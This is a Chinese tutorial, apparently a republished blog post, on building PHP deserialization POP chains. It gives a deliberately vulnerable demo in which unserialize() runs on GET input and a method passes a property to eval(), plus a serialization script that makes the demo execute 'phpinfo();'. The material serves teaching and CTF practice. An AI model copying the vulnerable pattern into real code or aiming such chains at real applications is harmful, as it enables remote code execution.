构造注入链:POP

Posted zzjdbk

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了构造注入链:POP相关的知识,希望对你有一定的参考价值。

1.POP链原理简介:

 

在反序列化中,我们能控制的数据就是对象中的属性值,所以在php反序列化中有一种
漏洞利用方法叫"面向属性编程",即POP( Property Oriented Programming)。
在反序列化漏洞利用中,最理想的情况就是漏洞能利用的点在那几个魔幻函数中,
而实际上往往是从这几个魔幻函数开始,逐步的跟进这个函数中调用的函数,直到找到可以利用的点。

 

试想一下,如果上面那个CTF题目的代码执行函数eval()函数不在__destruct这类
魔幻函数中,而是在一个普通的方法中,我们就没办法直接利用它执行代码了。
这个时候就需要构造一个链,链接到我们需要执行的函数eval()。 

我们来模拟一个简单的场景

 1 <?php
 2 class OowoO
 3 {
 4     protected $obj; 
 5     function __destruct()
 6     {
 7         //$obj = new test1; 这里可以控制$obj为任意对象
 8         $this->obj->a();
 9     }
10 }
11 
12 class test1{
13     function a(){
14         echo "123";
15     }
16 }
17 
18 class test2{
19     private $data;
20     function a(){
21         eval($this->data);
22     }
23 }
24 unserialize($_GET[‘a‘]);
25 ?>

利用:

 1 <script language="php">
 2 class OowoO{
 3     protected $obj;
 4 
 5     public function __construct(){
 6         $this->obj = new test2();
 7     }
 8 }
 9 class test2{
10     private $data = "phpinfo();";
11 }
12 echo urlencode(serialize(new OowoO()));
13 </script>

结果:

技术图片

 

 

值得注意的是,反序列化可以控制类的属性,无论private还是public。
但是这里有个坑,如果类中存在protected或者private属性的时候,序列化的时候会产生空
字节,所以记得urlencode一下,payload才会生效。

总的来说:如果魔幻函数中没有漏洞利用点,但是他调用了其他对象(意味着实例化了该对象)中的方法A,
由于上述demo5中我们传入的反序列化数据可以实例化任意对象,所以我们可以全局寻找一个和方法A同名的方法,然后逐个查看其他同名方法A中是否含有可利用的点。

 

以上是关于构造注入链:POP的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链

借安恒月赛web pop对象注入+反序列化字符逃逸深究其逃逸原理

借安恒月赛web pop对象注入+反序列化字符逃逸深究其逃逸原理

MRCTF Ezpop简单的pop链构造

bestphp's revenge

Android 片段和依赖注入